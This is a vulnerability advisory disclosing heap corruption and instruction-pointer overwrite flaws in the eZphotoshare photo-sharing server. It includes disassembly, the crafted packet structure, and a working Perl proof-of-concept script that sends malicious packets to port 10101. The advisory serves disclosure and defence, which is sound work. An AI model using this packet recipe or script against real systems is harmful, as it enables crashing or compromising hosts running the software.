eZphotoshare Multiple Overflow Vulnerabilities ############################################## Credit: Author : Peter Winter-Smith Software: Package : eZphotoshare Versions : All up to and including the latest verson Vendor : eZnetwork Vendor Url : http://www.ezphotoshare.com/ Vulnerability: Bug Type : Multiple *Interesting* Overflows Severity : Moderately/Highly Critical + Code Execution with Application Privileges + Arbitrary Memory can be Overwritten 1. Description of Software "eZphotoshare is an amazing new way to share Digital Photos over the Internet with friends and family. Seeing is believing, download it today and interactively share digital photos anytime, anywhere. It's FREE for home use." - Vendor's Description 2. Bug Information (a). Heap Corruption Vulnerability By sending a packet of data of length 80 bytes to eZphotoshare on port 10101 exactly eight times in a row, it is possible to overwrite the ecx and eax registers in memory when they are loaded from the esi pointer. The vulnerable code, which lies in the RtlAllocateHeap function in the module 'ntdll.dll', is shown below: :77F580C9 mov eax, dword ptr [esi+08] ; eax contains our arbitrary ; dword of data :77F580CC mov dword ptr [ebp+FFFFFF64], eax :77F580D2 mov ecx, dword ptr [esi+0C] ; ecx contains the next ; arbitrary dword of data which ; we supply :77F580D5 mov dword ptr [ebp+FFFFFF60], ecx :77F580DB mov dword ptr [ecx], eax ; write the contents of the eax ; register to the address ; referenced by the ecx ; register! The packet structure should be as follows: $packet = "GET /aaa" . $eax . $ecx . "a"x64; Where $eax and $ecx are four bytes exactly in length. This type of flaw could, amongst other things, allow a remote attacker to overwrite a saved return address on the target system and thus open the possibility of remote code execution with the privileges of the user running the application. (b). Overwriting of Important Saved Values By sending an overly long packet of data to eZphotoshare on port 10101 it is possible to overwrite some important saved values in the system memory which can be crafted to lead to complete control over the instruction pointer. The vulnerable code lies in 'mfc42.dll' and is shown below: :73DD1C3D mov edi, dword ptr [ebp+08] ; [ebp+08] points to a pointer ; to our user supplied data ... :73DD1C62 push [ebp+18] :73DD1C65 mov eax, dword ptr [edi] ; the value pointed at by the edi ; register comes directly from our user supplied data, therefore the eax ; register now contains anything we wish it to (even nulls!) ... :73DD1C6D FF90A0000000 call dword ptr [eax+000000A0] ; whammo! the ; execution flow is directed to the address contained at, eax plus a0h. To ; gain control of the instruction pointer we just need to point to an ; address containing the instruction pointer which we would like to use ; (remembering to subtract a0h from the pointer address), and we have full ; control of the eip register! Exploitation Notes: I have been able to execute code through the flaws found in eZphotoshare, despite the apparent complications which arise when it comes to exploitation, and therefore I would urge you to take measures to protect your systems if you use this software, whatever those measures may be. 3. Proof of Concept Code I have decided not to release my remote code execution exploits for the mentioned flaws until the vendor has had a fair amount of time to patch their software. Instead I am going to release a proof of concept code which will demonstrate the heap corruption vulnerability. I am not going to release code for the Important Value Overwrite vulnerability, since it is pretty straightforward to reproduce and is best just demonstrated with netcat or the like. For best results, attach the windbg utility to eZphotoshare before using this proof of concept code, so that you can see the attack and its results in realtime. # ---------------------------------[eZpsheap.pl]-------------------------------- # #!/usr/bin/perl -w # # Heap Corruption Vulnerability in eZphotoshare PoC # - by Peter Winter-Smith [peter4020@hotmail.com] use IO::Socket; if(!($ARGV[0])) { print "Usage: eZpsheap.pl \n\n"; exit; } print "Heap Corruption PoC\n"; for($n=1;$n<9;$n++){ $victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0], PeerPort=>"10101") or die "Unable to connect to $ARGV[0] on port 10101"; $eax = "ABCD"; $ecx = "XXXX"; $packet = "GET /aaa" . $eax . $ecx . "a"x64; print $victim $packet; print " + Sending packet number $n of 8 ...\n"; sleep(1); close($victim); } print "Done.\n"; exit; # ------------------------------------------------------------------------------ 4. Patches - Workarounds No known patches have been issued. Secunia often have pretty sufficient workarounds, so I would recommend that you check their 'solutions' on www.secunia.com if you want a professional opinion. 5. Credits The discovery, analysis and exploitation of this flaw is a result of research carried out by Peter Winter-Smith. I would ask that you do not regard any of the analysis to be 'set in stone', and that if investigating this flaw you back trace the steps detailed earlier for yourself. Greets and thanks to: David and Mark Litchfield, JJ Gray (Nexus), Todd and all the packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)), pv8man, nick k., Joel J. and Martine. Huge thanks to everyone who makes this industry as great as it is, and puts up with all my ever so vague and technically questionable contributions ;o) Brett Moore - Are you *trying* to break Microsoft? ;o) ;o( o This document should be mirrored at: - http://www.elitehaven.net/ezphotoshare.txt _________________________________________________________________ Hotmail messages direct to your mobile phone http://www.msn.co.uk/msnmobile